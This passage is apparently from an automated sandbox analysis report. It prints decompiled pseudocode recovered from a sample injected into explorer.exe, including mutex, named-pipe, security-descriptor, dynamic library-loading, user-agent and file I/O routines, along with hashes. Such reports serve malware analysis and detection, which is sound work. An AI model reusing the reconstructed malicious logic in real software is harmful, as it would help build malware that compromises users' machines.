                            										memset(_t113 + _t61, 0, _t92 << 2);
                            									}
                            									L19:
                            									_t89 =  *0x9e76c; // 0x1e0
                            									E0008A4DB(_t89);
                            									_t58 = _t73;
                            									L20:
                            									return _t58;
                            								}
                            								_t110 = _a4;
                            								_t65 = E00088604(_t110);
                            								_t97 =  *0x9e770; // 0xc0f8a0
                            								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                            								_t66 =  *0x9e770; // 0xc0f8a0
                            								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                            									goto L19;
                            								}
                            								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                            								_t67 =  *0x9e770; // 0xc0f8a0
                            								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                            								_t115 = _t115 + 0xc;
                            								goto L14;
                            							}
                            							goto L7;
                            						}
                            						_t69 =  *0x9e684; // 0xc2f8f0
                            						_push(_t73);
                            						_push(_t78);
                            						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                            							_t45 =  *0x9e770; // 0xc0f8a0
                            							goto L7;
                            						}
                            						_t98 =  *0x9e770; // 0xc0f8a0
                            						E0008984A(_t106 + _t98, 0);
                            						_t45 =  *0x9e770; // 0xc0f8a0
                            						goto L6;
                            						L7:
                            						_t106 = _t106 + 0x20;
                            						_t112 = _t112 + 1;
                            					} while (_t106 < 0x1000);
                            					goto L19;
                            				}
                            				_t58 = 0;
                            				goto L20;
                            			}

                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
                            • Opcode Fuzzy Hash: 13136b35abf7dcd7586c6f32f264bee96a55df3916c08bc9964099082c366c6c
                            • Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 26%
                            			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				char _v12;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				intOrPtr _t29;
                            				intOrPtr* _t39;
                            				void* _t47;
                            				intOrPtr _t55;
                            				intOrPtr _t58;
                            				char _t60;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t50 = _a4;
                            				_t60 = 0;
                            				_v12 = 0;
                            				if(_a4 != 0) {
                            					_t47 = E0008A63B(_t50);
                            					if(_t47 == 0) {
                            						L11:
                            						_t26 = 0;
                            						L12:
                            						L13:
                            						return _t26;
                            					}
                            					_t27 =  *0x9e684; // 0xc2f8f0
                            					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                            					if(_t58 == 0) {
                            						L9:
                            						_t29 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                            						if(_t60 != 0) {
                            							E0008861A( &_v12, 0);
                            						}
                            						goto L11;
                            					}
                            					_t4 = _t58 + 1; // 0x1
                            					_t60 = E00088604(_t4);
                            					_v12 = _t60;
                            					if(_t60 == 0) {
                            						goto L9;
                            					}
                            					_a4 = _a4 & 0;
                            					_push(0);
                            					_v8 = 0;
                            					_push( &_a4);
                            					_push(_t58);
                            					_push(_t60);
                            					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                            						if(_a4 == 0) {
                            							if(_v8 != _t58) {
                            								goto L9;
                            							}
                            							_t39 = _a8;
                            							 *((char*)(_t58 + _t60)) = 0;
                            							if(_t39 != 0) {
                            								 *_t39 = _t58;
                            							}
                            							CloseHandle(_t47);
                            							_t26 = _t60;
                            							goto L12;
                            						}
                            						_t55 = _v8 + _a4;
                            						_a4 = _a4 & 0x00000000;
                            						_push(0);
                            						_push( &_a4);
                            						_v8 = _t55;
                            						_push(_t58 - _t55);
                            						_push(_t55 + _t60);
                            					}
                            					goto L9;
                            				}
                            				_t26 = 0;
                            				goto L13;
                            			}

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
                            • CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,00C2FD20,00000400), ref: 0008A776
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleRead
                            • String ID:
                            • API String ID: 2331702139-0
                            • Opcode ID: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
                            • Opcode Fuzzy Hash: 88356f6b106add4076ec0f83c2a296f690f09df244fe65e188c16454d9d3e760
                            • Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E0008153B(void* __ecx, void* __edx) {
                            				void* _v8;
                            				void* _t3;
                            				signed int _t4;
                            				char* _t7;
                            				signed int _t9;
                            				intOrPtr _t10;
                            				void* _t24;
                            
                            				_push(__ecx);
                            				_t3 = CreateMutexA(0, 0, 0);
                            				 *0x9e6f4 = _t3;
                            				if(_t3 == 0) {
                            					L11:
                            					_t4 = _t3 | 0xffffffff;
                            					__eflags = _t4;
                            				} else {
                            					_t3 = CreateMutexA(0, 0, 0);
                            					 *0x9e6dc = _t3;
                            					if(_t3 == 0) {
                            						goto L11;
                            					} else {
                            						_t3 = E00081080(0x4ac);
                            						_v8 = _t3;
                            						if(_t3 == 0) {
                            							goto L11;
                            						} else {
                            							 *0x9e6e8 = E000891A6(_t3, 0);
                            							E000885C2( &_v8);
                            							_t7 = E00088604(0x100);
                            							E0009E6F0 = _t7;
                            							if(_t7 != 0) {
                            								 *0x9e6fc = 0;
                            								_t9 = E00088604(0x401);
                            								 *0x9e6d4 = _t9;
                            								__eflags = _t9;
                            								if(_t9 != 0) {
                            									__eflags =  *0x9e6c0; // 0x0
                            									if(__eflags == 0) {
                            										E000915B6(0x88202, 0x8820b);
                            									}
                            									_push(0x61e);
                            									_t24 = 8;
                            									_t10 = E0008E1BC(0x9bd28, _t24); // executed
                            									 *0x9e6a0 = _t10;
                            									_t4 = 0;
                            								} else {
                            									_push(0xfffffffc);
                            									goto L5;
                            								}
                            							} else {
                            								_push(0xfffffffe);
                            								L5:
                            								_pop(_t4);
                            							}
                            						}
                            					}
                            				}
                            				return _t4;
                            			}

                            APIs
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateMutex$AllocateHeap
                            • String ID:
                            • API String ID: 704353917-0
                            • Opcode ID: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
                            • Opcode Fuzzy Hash: 77af8db251a9b19979746917907dab4167f055f59f2981c2fe2ca95fd249f9b3
                            • Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E0008BC7A(void* __ecx, void* __edx) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _t18;
                            				intOrPtr _t19;
                            				intOrPtr _t27;
                            				intOrPtr _t30;
                            				intOrPtr _t36;
                            				intOrPtr _t38;
                            				char _t39;
                            
                            				_t39 = 0;
                            				_t38 =  *0x9e674; // 0x1fc
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_v16 = 0;
                            				_t18 = E000895E1(__ecx, 0x84b);
                            				_push(0);
                            				_v24 = _t18;
                            				_push( &_v8);
                            				_push(1);
                            				_push(_t18);
                            				_t19 =  *0x9e68c; // 0xc2fab8, executed
                            				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                            					_push( &_v16);
                            					_push( &_v12);
                            					_push( &_v20);
                            					_t27 =  *0x9e68c; // 0xc2fab8
                            					_push(_v8);
                            					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                            						_push(_v12);
                            						_t30 =  *0x9e68c; // 0xc2fab8
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0x10);
                            						_push(6);
                            						_push(_t38); // executed
                            						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                            							_t39 = 1;
                            						}
                            					}
                            					_t36 =  *0x9e68c; // 0xc2fab8
                            					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                            				}
                            				E000885D5( &_v24);
                            				return _t39;
                            			}

                            APIs
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCB1
                            • SetSecurityInfo.ADVAPI32(000001FC,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Security$Descriptor$ConvertInfoString
                            • String ID:
                            • API String ID: 3187949549-0
                            • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                            • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                            • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _t5;
                            				struct HINSTANCE__* _t7;
                            				void* _t10;
                            				void* _t12;
                            				void* _t22;
                            				void* _t25;
                            
                            				_push(__ecx);
                            				_t12 = __ecx;
                            				_t22 = __edx;
                            				_t5 = E000895C7(_a4);
                            				_t25 = 0;
                            				_v8 = _t5;
                            				_push(_t5);
                            				if(_a4 != 0x7c3) {
                            					_t7 = LoadLibraryA(); // executed
                            				} else {
                            					_t7 = GetModuleHandleA();
                            				}
                            				if(_t7 != 0) {
                            					_t10 = E0008E171(_t12, _t22, _t7); // executed
                            					_t25 = _t10;
                            				}
                            				E000885C2( &_v8);
                            				return _t25;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                            • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                            • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                            				WCHAR* _v8;
                            				char _v12;
                            				char _v44;
                            				char _v564;
                            				char _v1084;
                            				void* __esi;
                            				void* _t23;
                            				struct _SECURITY_ATTRIBUTES* _t25;
                            				int _t27;
                            				char _t32;
                            				char _t38;
                            				intOrPtr _t39;
                            				void* _t40;
                            				WCHAR* _t41;
                            				void* _t54;
                            				char* _t60;
                            				char* _t63;
                            				void* _t70;
                            				WCHAR* _t71;
                            				intOrPtr* _t73;
                            
                            				_t70 = __ecx;
                            				_push(__ecx);
                            				E0008B700(__edx,  &_v44, __eflags, __fp0);
                            				_t52 = _t70;
                            				if(E0008BB8D(_t70) == 0) {
                            					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                            					_pop(_t54);
                            					__eflags = _t23;
                            					if(__eflags == 0) {
                            						_t71 = E00082C64( &_v1084, __eflags);
                            					} else {
                            						E0008B012(_t54,  &_v564); // executed
                            						_t32 = E0008109A(_t54, 0x375);
                            						_push(0);
                            						_v12 = _t32;
                            						_push( &_v44);
                            						_t60 = "\\";
                            						_push(_t60);
                            						_push(_t32);
                            						_push(_t60);
                            						_push( &_v564);
                            						_push(_t60);
                            						_t71 = E000892E5( &_v1084);
                            						E000885D5( &_v12);
                            					}
                            				} else {
                            					_t38 = E0008109A(_t52, 0x4e0);
                            					 *_t73 = 0x104;
                            					_v12 = _t38;
                            					_t39 =  *0x9e684; // 0xc2f8f0
                            					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                            					_t78 = _t40;
                            					if(_t40 != 0) {
                            						_t41 = E0008109A( &_v564, 0x375);
                            						_push(0);
                            						_v8 = _t41;
                            						_push( &_v44);
                            						_t63 = "\\";
                            						_push(_t63);
                            						_push(_t41);
                            						_push(_t63);
                            						_t71 = E000892E5( &_v564);
                            						E000885D5( &_v8);
                            					} else {
                            						_t71 = E00082C64( &_v44, _t78);
                            					}
                            					E000885D5( &_v12);
                            				}
                            				_v8 = _t71;
                            				_t25 = E0008B269(_t71);
                            				if(_t25 == 0) {
                            					_t27 = CreateDirectoryW(_t71, _t25); // executed
                            					if(_t27 == 0 || E0008B269(_t71) == 0) {
                            						E0008861A( &_v8, 0xfffffffe);
                            						_t71 = _v8;
                            					}
                            				}
                            				return _t71;
                            			}
























                            APIs
                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectory
                            • String ID:
                            • API String ID: 4241100979-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E000831C2(void* __edx, void* __eflags) {
                            				CHAR* _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				void* _v20;
                            				signed int _t10;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            				void* _t16;
                            				intOrPtr _t18;
                            				intOrPtr _t22;
                            				intOrPtr _t28;
                            				void* _t38;
                            				CHAR* _t40;
                            
                            				_t38 = __edx;
                            				_t28 =  *0x9e688; // 0xb0000
                            				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                            				_t40 = _t10;
                            				_v8 = _t40;
                            				if(_t40 != 0) {
                            					_t11 = E00088604(0x80000); // executed
                            					 *0x9e724 = _t11;
                            					__eflags = _t11;
                            					if(_t11 != 0) {
                            						_t12 = E0008BD10(); // executed
                            						_v16 = _t12;
                            						__eflags = _t12;
                            						if(_t12 != 0) {
                            							_push(0xc);
                            							_pop(0);
                            							_v12 = 1;
                            						}
                            						_v20 = 0;
                            						__eflags = 0;
                            						asm("sbb eax, eax");
                            						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                            						 *0x9e674 = _t16;
                            						__eflags = _t16 - 0xffffffff;
                            						if(_t16 != 0xffffffff) {
                            							E0008BC7A( &_v20, _t38); // executed
                            							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
                            							__eflags = _t18;
                            							if(_t18 != 0) {
                            								goto L12;
                            							}
                            							_t22 =  *0x9e684; // 0xc2f8f0
                            							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
                            							_push(0xfffffffd);
                            							goto L11;
                            						} else {
                            							 *0x9e674 = 0;
                            							_push(0xfffffffe);
                            							L11:
                            							_pop(0);
                            							L12:
                            							E0008861A( &_v8, 0xffffffff);
                            							return 0;
                            						}
                            					}
                            					_push(0xfffffff5);
                            					goto L11;
                            				}
                            				return _t10 | 0xffffffff;
                            			}

















                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00085AFF(intOrPtr __edx, void* __fp0) {
                            				short _v30;
                            				short _v32;
                            				short _v34;
                            				short _v36;
                            				intOrPtr* _t22;
                            				intOrPtr _t23;
                            				signed int _t30;
                            				intOrPtr _t38;
                            				intOrPtr* _t40;
                            				intOrPtr _t44;
                            				intOrPtr _t45;
                            				intOrPtr* _t46;
                            				signed int _t47;
                            				void* _t55;
                            
                            				_t55 = __fp0;
                            				_t45 = __edx;
                            				_t47 = 0;
                            				_t22 = E00088604(0x14);
                            				_t38 =  *0x9e688; // 0xb0000
                            				_t46 = _t22;
                            				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                            					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                            					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                            					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                            					_v30 = 0;
                            					GetDriveTypeW( &_v36); // executed
                            				}
                            				 *_t46 = 2;
                            				 *(_t46 + 4) = _t47;
                            				_t23 =  *0x9e688; // 0xb0000
                            				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                            				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                            				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                            				if(_t40 == 0) {
                            					L9:
                            					if(E00082DCB() == 0) {
                            						goto L11;
                            					} else {
                            						_t47 = _t47 | 0xffffffff;
                            					}
                            				} else {
                            					_t45 =  *_t40;
                            					_t30 = _t47;
                            					if(_t45 == 0) {
                            						goto L9;
                            					} else {
                            						_t44 =  *((intOrPtr*)(_t40 + 4));
                            						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                            							_t30 = _t30 + 1;
                            							if(_t30 < _t45) {
                            								continue;
                            							} else {
                            								goto L9;
                            							}
                            							goto L12;
                            						}
                            						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                            							L11:
                            							E00084D6D(_t46, _t45, _t55);
                            						} else {
                            							goto L9;
                            						}
                            					}
                            				}
                            				L12:
                            				E0008A39E();
                            				E0008A39E();
                            				return _t47;
                            			}


















                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateDriveHeapType
                            • String ID:
                            • API String ID: 414167704-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E0008E450(void* __ecx, void* __edx) {
                            				char _v8;
                            				intOrPtr* _t5;
                            				intOrPtr _t10;
                            				intOrPtr* _t11;
                            				void* _t12;
                            
                            				_push(__ecx);
                            				_t5 =  *0x9e6b0; // 0xc0f318
                            				if( *_t5 == 0) {
                            					_v8 = E000895C7(0x2a7);
                            					 *0x9e788 = E000891A6(_t6, 0);
                            					E000885C2( &_v8);
                            					goto L4;
                            				} else {
                            					_v8 = 0x100;
                            					_t10 = E00088604(0x101);
                            					 *0x9e788 = _t10;
                            					_t11 =  *0x9e6b0; // 0xc0f318
                            					_t12 =  *_t11(0, _t10,  &_v8); // executed
                            					if(_t12 == 0) {
                            						L4:
                            						return 0;
                            					} else {
                            						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                            					}
                            				}
                            			}









                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AgentAllocateFreeObtainStringUser
                            • String ID:
                            • API String ID: 471734292-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t13;
                            				void* _t21;
                            				void* _t23;
                            				void* _t26;
                            
                            				_t23 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t26 = 0;
                            				_v12 = __ecx;
                            				_t21 = __edx;
                            				if(_a4 == 0) {
                            					L3:
                            					_t13 = 1;
                            				} else {
                            					while(1) {
                            						_v8 = _v8 & 0x00000000;
                            						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                            							break;
                            						}
                            						_t26 = _t26 + _v8;
                            						_t23 = _v12;
                            						if(_t26 < _a4) {
                            							continue;
                            						} else {
                            							goto L3;
                            						}
                            						goto L4;
                            					}
                            					_t13 = 0;
                            				}
                            				L4:
                            				return _t13;
                            			}










                            APIs
                            • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A5F7(WCHAR* __ecx, long __edx) {
                            				intOrPtr _t6;
                            				long _t12;
                            				void* _t13;
                            
                            				_t12 = __edx;
                            				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                            				if(_t13 != 0xffffffff) {
                            					if(_t12 == 4) {
                            						_t6 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                            					}
                            					return _t13;
                            				}
                            				return 0;
                            			}







                            APIs
                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00083017() {
                            				signed int _t4;
                            				intOrPtr _t8;
                            				void* _t11;
                            
                            				_t4 =  *0x9e688; // 0xb0000
                            				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
                            					L3:
                            					return _t4 | 0xffffffff;
                            				} else {
                            					_t4 = E0008BB20(_t11);
                            					if(_t4 != 0) {
                            						goto L3;
                            					} else {
                            						AllocConsole();
                            						_t8 =  *0x9e684; // 0xc2f8f0
                            						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
                            						return 0;
                            					}
                            				}
                            			}







                            APIs
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocConsole
                            • String ID:
                            • API String ID: 4167703944-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E0008A63B(WCHAR* __ecx) {
                            				signed int _t5;
                            
                            				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                            				_t2 = _t5 + 1; // 0x1
                            				asm("sbb ecx, ecx");
                            				return _t5 &  ~_t2;
                            			}





                            APIs
                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                            • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                            • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00088604(long _a4) {
                            				void* _t2;
                            
                            				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                            				return _t2;
                            			}





                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                            • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                            • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008B269(WCHAR* __ecx) {
                            
                            				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                            			}




                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                            • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                            • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                            Uniqueness

                            Uniqueness Score: -1.00%

